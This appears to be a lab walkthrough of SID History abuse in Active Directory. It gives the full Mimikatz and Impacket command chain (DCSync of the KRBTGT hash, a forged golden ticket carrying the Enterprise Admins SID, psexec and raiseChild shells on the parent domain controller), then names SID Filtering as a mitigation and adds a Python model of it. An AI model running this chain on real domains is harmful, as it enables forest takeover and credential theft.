SID History Abuse

Every user account in a Windows domain has an associated Security Identifier (SID). When a user logs into a domain, their SID is included in the user's access token, and that value is used for identity-based security decisions.

Active Directory supports a feature called SID History, which allows a single user account to have multiple associated SID values. It is intended for migrating users from a legacy domain to a new domain, ensuring they can still access resources in both domains.

Manipulating SID history requires domain administrator privileges in a target domain. If an adversary is able to compromise a child domain within a forest, SID history can be manipulated to gain administrative control of the parent domain.

Trust Enumeration

nltest.exe can be used to enumerate domain trusts. In the output below, we can see that a trust exists between bordergate.local (the forest root) and the child domain child.bordergate.local.

C:\Users\Administrator>nltest /domain_trusts
List of domain trusts:
    0: BORDERGATE bordergate.local (NT 5) (Forest Tree Root) (Direct Outbound) (Direct Inbound) ( Attr: withinforest )
    1: CHILD child.bordergate.local (NT 5) (Forest: 0) (Primary Domain) (Native)
The command completed successfully

Domain trusts can also be enumerated using the Get-ADTrust cmdlet from the ActiveDirectory PowerShell module:

Get-ADTrust -Filter *
Direction               : BiDirectional
DisallowTransivity      : False
DistinguishedName       : CN=bordergate.local,CN=System,DC=child,DC=bordergate,DC=local
ForestTransitive        : False
IntraForest             : True
IsTreeParent            : False
IsTreeRoot              : False
Name                    : bordergate.local
ObjectClass             : trustedDomain
ObjectGUID              : 006fc34d-9cb6-4d0d-a7f8-6cdfe2fb9e33
SelectiveAuthentication : False
SIDFilteringForestAware : False
SIDFilteringQuarantined : False
Source                  : DC=child,DC=bordergate,DC=local
Target                  : bordergate.local
TGTDelegation           : False
TrustAttributes         : 32
TrustedPolicy           :
TrustingPolicy          :
TrustType               : Uplevel
UplevelOnly             : False
UsesAESKeys             : False
UsesRC4Encryption       : False

Exploiting SID History with Windows

Using a combination of PowerView and Mimikatz we can carry out a SID history attack from Windows. The following details need to be gathered:

  • The FQDNs of the child and parent domains
  • The child and parent domains' SID values
  • The RC4 (NT hash) or AES key of the child domain's KRBTGT account

FQDN Extraction with PowerView

PS C:\Users\Administrator\Desktop> . .\PowerView.ps1

PS C:\Users\Administrator\Desktop> Get-NetDomainTrust
SourceName      : child.bordergate.local
TargetName      : bordergate.local
TrustType       : WINDOWS_ACTIVE_DIRECTORY
TrustAttributes : WITHIN_FOREST
TrustDirection  : Bidirectional
WhenCreated     : 27/01/2024 11:03:26
WhenChanged     : 27/01/2024 11:03:26

PS C:\Users\Administrator\Desktop> Get-NetForestDomain
Forest                  : bordergate.local
DomainControllers       : {DC01.bordergate.local}
Children                : {child.bordergate.local}
DomainMode              : Unknown
DomainModeLevel         : 7
Parent                  :
PdcRoleOwner            : DC01.bordergate.local
RidRoleOwner            : DC01.bordergate.local
InfrastructureRoleOwner : DC01.bordergate.local
Name                    : bordergate.local

Forest                  : bordergate.local
DomainControllers       : {CDC01.child.bordergate.local}
Children                : {}
DomainMode              : Unknown
DomainModeLevel         : 7
Parent                  : bordergate.local
PdcRoleOwner            : CDC01.child.bordergate.local
RidRoleOwner            : CDC01.child.bordergate.local
InfrastructureRoleOwner : CDC01.child.bordergate.local
Name                    : child.bordergate.local

Determining the Parent and Child Domain SIDs

PowerView's Get-DomainSID can be used for this purpose:

PS C:\Users\Administrator\Desktop> Get-DomainSID -Domain child.bordergate.local
S-1-5-21-3282285589-3699175333-1759823265
PS C:\Users\Administrator\Desktop> Get-DomainSID -Domain bordergate.local
S-1-5-21-678665010-2561942565-514098031

KRBTGT Extraction with Mimikatz

We can extract the child domain's KRBTGT hash using the following Mimikatz one-liner (DCSync):

mimikatz.exe "privilege::debug" "lsadump::dcsync /user:CHILD\krbtgt" "exit"

  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # privilege::debug
Privilege '20' OK

mimikatz(commandline) # lsadump::dcsync /user:CHILD\krbtgt
[DC] 'child.bordergate.local' will be the domain
[DC] 'CDC01.child.bordergate.local' will be the DC server
[DC] 'CHILD\krbtgt' will be the user account
[rpc] Service  : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)

Object RDN           : krbtgt

** SAM ACCOUNT **

SAM Username         : krbtgt
Account Type         : 30000000 ( USER_OBJECT )
User Account Control : 00000202 ( ACCOUNTDISABLE NORMAL_ACCOUNT )
Account expiration   :
Password last change : 27/01/2024 11:04:06
Object Security ID   : S-1-5-21-3282285589-3699175333-1759823265-502
Object Relative ID   : 502

Credentials:
  Hash NTLM: b3a2319d94fe4aeae0f1fd5b017eed82
    ntlm- 0: b3a2319d94fe4aeae0f1fd5b017eed82
    lm  - 0: 572c05076819c0d36b6d2e30b8b7f5b3

Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
    Random Value : 92aa3fc70fca259306071a788a8c48c2

mimikatz(commandline) # exit
Bye!

Carrying out the Attack

At this point, we have collected the following details:

Requirement                Value
Parent domain FQDN         bordergate.local
Child domain FQDN          child.bordergate.local
Parent domain SID          S-1-5-21-678665010-2561942565-514098031
Child domain SID           S-1-5-21-3282285589-3699175333-1759823265
Child domain KRBTGT RC4    b3a2319d94fe4aeae0f1fd5b017eed82

We also need the SID of the parent domain's Enterprise Admins group. Since its RID is the well-known value 519, we can simply append it to the parent domain SID: S-1-5-21-678665010-2561942565-514098031-519

We then use Mimikatz to generate a golden ticket for the child domain that carries the parent domain's Enterprise Admins SID in its SID history (the /sids parameter). Before the ticket is injected, the parent domain controller's C$ share is inaccessible:

C:\Users\Administrator\Desktop>dir \\DC01.bordergate.local\C$
Access is denied.

C:\Users\Administrator\Desktop>mimikatz.exe "kerberos::golden /user:Administrator /domain:child.bordergate.local /sid:S-1-5-21-3282285589-3699175333-1759823265 /sids:S-1-5-21-678665010-2561942565-514098031-519 /rc4:b3a2319d94fe4aeae0f1fd5b017eed82 /ticket:ticket.kirbi /ptt" "exit"

  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # kerberos::golden /user:Administrator /domain:child.bordergate.local /sid:S-1-5-21-3282285589-3699175333-1759823265 /sids:S-1-5-21-678665010-2561942565-514098031-519 /rc4:b3a2319d94fe4aeae0f1fd5b017eed82 /ticket:ticket.kirbi /ptt
User      : Administrator
Domain    : child.bordergate.local (CHILD)
SID       : S-1-5-21-3282285589-3699175333-1759823265
User Id   : 500
Groups Id : *513 512 520 518 519
Extra SIDs: S-1-5-21-678665010-2561942565-514098031-519 ;
ServiceKey: b3a2319d94fe4aeae0f1fd5b017eed82 - rc4_hmac_nt
Lifetime  : 27/01/2024 14:26:25 ; 24/01/2034 14:26:25 ; 24/01/2034 14:26:25
-> Ticket : ** Pass The Ticket **

 * PAC generated
 * PAC signed
 * EncTicketPart generated
 * EncTicketPart encrypted
 * KrbCred generated

Golden ticket for 'Administrator @ child.bordergate.local' successfully submitted for current session

mimikatz(commandline) # exit
Bye!

C:\Users\Administrator\Desktop>dir \\DC01.bordergate.local\C$
 Volume in drive \\DC01.bordergate.local\C$ has no label.
 Volume Serial Number is 2CAB-3D22

 Directory of \\DC01.bordergate.local\C$

08/05/2021  08:20    <DIR>          PerfLogs
27/01/2024  09:30    <DIR>          Program Files
08/05/2021  09:40    <DIR>          Program Files (x86)
27/01/2024  09:23    <DIR>          Users
27/01/2024  13:57    <DIR>          Windows
               0 File(s)              0 bytes
               5 Dir(s)  40,117,248,000 bytes free


Attacking with Linux

The same attack can also be launched from a Linux system:

Determining the Parent and Child Domain SIDs

Querying the parent domain controller (192.168.1.205) and the child domain controller (192.168.1.240) with impacket-lookupsid returns each domain's SID:

└─$ impacket-lookupsid CHILD/Alice:Password1@192.168.1.205 | grep "Domain SID"
[*] Domain SID is: S-1-5-21-678665010-2561942565-514098031

┌──(kali㉿kali)-[~/forest-trust-tools]
└─$ impacket-lookupsid CHILD/Alice:Password1@192.168.1.240 | grep "Domain SID"
[*] Domain SID is: S-1-5-21-3282285589-3699175333-1759823265

KRBTGT Extraction with impacket-secretsdump

impacket-secretsdump CHILD/Alice:Password1@192.168.1.240 -just-dc-user CHILD/krbtgt
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:b3a2319d94fe4aeae0f1fd5b017eed82:::
[*] Kerberos keys grabbed
krbtgt:aes256-cts-hmac-sha1-96:dabdbd6e19f848dfc0eadf1f7445e1d1a12eb5ea33de99ec30500fef4ace7a93
krbtgt:aes128-cts-hmac-sha1-96:10270f335d0d6b548e1842ea0e6733c6
krbtgt:des-cbc-md5:0d640e94da8c4915
[*] Cleaning up... 

Carrying out the Attack

┌──(kali㉿kali)-[~]
└─$ impacket-ticketer -nthash b3a2319d94fe4aeae0f1fd5b017eed82  -domain child.bordergate.local -domain-sid S-1-5-21-3282285589-3699175333-1759823265  -extra-sid S-1-5-21-678665010-2561942565-514098031-519  Administrator
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for child.bordergate.local/Administrator
[*]     PAC_LOGON_INFO
[*]     PAC_CLIENT_INFO_TYPE
[*]     EncTicketPart
[*]     EncAsRepPart
[*] Signing/Encrypting final ticket
[*]     PAC_SERVER_CHECKSUM
[*]     PAC_PRIVSVR_CHECKSUM
[*]     EncTicketPart
[*]     EncASRepPart
[*] Saving ticket in Administrator.ccache

┌──(kali㉿kali)-[~]
└─$ export KRB5CCNAME=Administrator.ccache

┌──(kali㉿kali)-[~]
└─$ klist
Ticket cache: FILE:Administrator.ccache
Default principal: Administrator@CHILD.BORDERGATE.LOCAL

Valid starting     Expires            Service principal
27/01/24 15:02:23  24/01/34 15:02:23  krbtgt/CHILD.BORDERGATE.LOCAL@CHILD.BORDERGATE.LOCAL
        renew until 24/01/34 15:02:23

┌──(kali㉿kali)-[~]
└─$ impacket-psexec CHILD.bordergate.local/Administrator@dc01.bordergate.local -k -no-pass
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Requesting shares on dc01.bordergate.local.....
[*] Found writable share ADMIN$
[*] Uploading file pijDaCeK.exe
[*] Opening SVCManager on dc01.bordergate.local.....
[*] Creating service PYVP on dc01.bordergate.local.....
[*] Starting service PYVP.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.20348.587]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32> 

Note: When using impacket-psexec it is important to use the domain FQDN for the user; with the short name the client cannot resolve a KDC for the realm (port 88) and you will likely receive the following error: “[-] [Errno Connection error (CHILD:88)] [Errno -3] Temporary failure in name resolution”


Automated Exploitation

impacket-raiseChild is an Impacket script that automates the whole chain: it gathers the required details and then opens a shell on the parent domain controller:

impacket-raiseChild -target-exec 192.168.1.205 child.bordergate.local/alice:'Password1'
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Raising child domain child.bordergate.local
[*] Forest FQDN is: bordergate.local
[*] Raising child.bordergate.local to bordergate.local
[*] bordergate.local Enterprise Admin SID is: S-1-5-21-678665010-2561942565-514098031-519
[*] Getting credentials for child.bordergate.local
child.bordergate.local/krbtgt:502:aad3b435b51404eeaad3b435b51404ee:b3a2319d94fe4aeae0f1fd5b017eed82:::
child.bordergate.local/krbtgt:aes256-cts-hmac-sha1-96s:dabdbd6e19f848dfc0eadf1f7445e1d1a12eb5ea33de99ec30500fef4ace7a93
[*] Getting credentials for bordergate.local
bordergate.local/krbtgt:502:aad3b435b51404eeaad3b435b51404ee:48aae46c1e41eca204a6aa70a6aedd48:::
bordergate.local/krbtgt:aes256-cts-hmac-sha1-96s:2b52d519771b9b1266342151af0cc8e646d66d4a6baa59c2d443f4445b6acf0f
[*] Target User account name is Administrator
bordergate.local/Administrator:500:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b:::
bordergate.local/Administrator:aes256-cts-hmac-sha1-96s:bb9930dc9a2266e2491cdb468d6eb7441d87053fd483b8ff2473545fc71b3482
[*] Opening PSEXEC shell at DC01.bordergate.local
[*] Requesting shares on DC01.bordergate.local.....
[*] Found writable share ADMIN$
[*] Uploading file qdrQNfow.exe
[*] Opening SVCManager on DC01.bordergate.local.....
[*] Creating service pWac on DC01.bordergate.local.....
[*] Starting service pWac.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.20348.587]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32>hostname
DC01

C:\Windows\system32>whoami
nt authority\system

In Conclusion

Domains are not intended to be a security boundary (the forest is), and there are numerous other ways to escalate from a child domain to its parent. Enabling a feature called “SID Filtering” on the trust would partly mitigate this attack: the trusting domain then discards SIDs belonging to other domains from the authorization data presented across the trust, so the injected Enterprise Admins SID is never honoured.
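As an added example (not code from the original post), the following Python models the two pieces of reasoning on this page: the Enterprise Admins SID is simply the parent domain SID with the well-known RID 519 appended, and SID Filtering defeats the injection by discarding any SID whose domain part is not the trusted domain's own. The SID values are the ones shown above; the filtering logic is a simplified model of quarantine behaviour, not Microsoft's implementation.

```python
import re
from typing import Dict, List, NamedTuple, Optional, Tuple

# Sample values constructed from the SIDs shown on this page (not live AD data).
CHILD_SID = "S-1-5-21-3282285589-3699175333-1759823265"
PARENT_SID = "S-1-5-21-678665010-2561942565-514098031"
DOMAINS: Dict[str, str] = {CHILD_SID: "child.bordergate.local",
                           PARENT_SID: "bordergate.local"}
# Well-known RIDs; 519 is the one the page appends to the parent domain SID.
WELL_KNOWN_RIDS = {500: "Administrator", 512: "Domain Admins",
                   518: "Schema Admins", 519: "Enterprise Admins"}
# Domain SIDs look like S-1-5-21-<a>-<b>-<c>, optionally followed by a RID.
DOMAIN_SID_RE = re.compile(r"^S-1-5-21(?:-\d+){3}(?:-\d+)?$")

class Sid(NamedTuple):
    domain: str         # the S-1-5-21-<a>-<b>-<c> part identifying the domain
    rid: Optional[int]  # trailing relative identifier, None for a bare domain SID

def parse_sid(text: str) -> Sid:
    """Split a domain-relative SID into its domain identifier and RID."""
    if not DOMAIN_SID_RE.match(text):
        raise ValueError(f"not an S-1-5-21 domain SID: {text}")
    parts = text.split("-")
    return Sid("-".join(parts[:7]), int(parts[7]) if len(parts) == 8 else None)

def describe(text: str) -> str:
    """Label a SID, e.g. 'Enterprise Admins of bordergate.local'."""
    sid = parse_sid(text)
    who = "domain" if sid.rid is None else WELL_KNOWN_RIDS.get(sid.rid, f"RID {sid.rid}")
    return f"{who} of {DOMAINS.get(sid.domain, 'unknown domain ' + sid.domain)}"

def sid_filter(trusted_domain_sid: str, pac_sids: List[str]) -> Tuple[List[str], List[str]]:
    """Simplified model of SID filtering (quarantine) on the trusting side: a SID
    presented across the trust is kept only if its domain part is the trusted
    domain's own SID, so an injected parent-domain SID is dropped."""
    trusted = parse_sid(trusted_domain_sid).domain
    kept, dropped = [], []
    for s in pac_sids:
        (kept if parse_sid(s).domain == trusted else dropped).append(s)
    return kept, dropped

if __name__ == "__main__":
    # Child Domain Admins (genuinely from the child) plus the forged parent EA SID.
    kept, dropped = sid_filter(CHILD_SID, [CHILD_SID + "-512", PARENT_SID + "-519"])
    print("kept:   ", [describe(s) for s in kept])
    print("dropped:", [describe(s) for s in dropped])
```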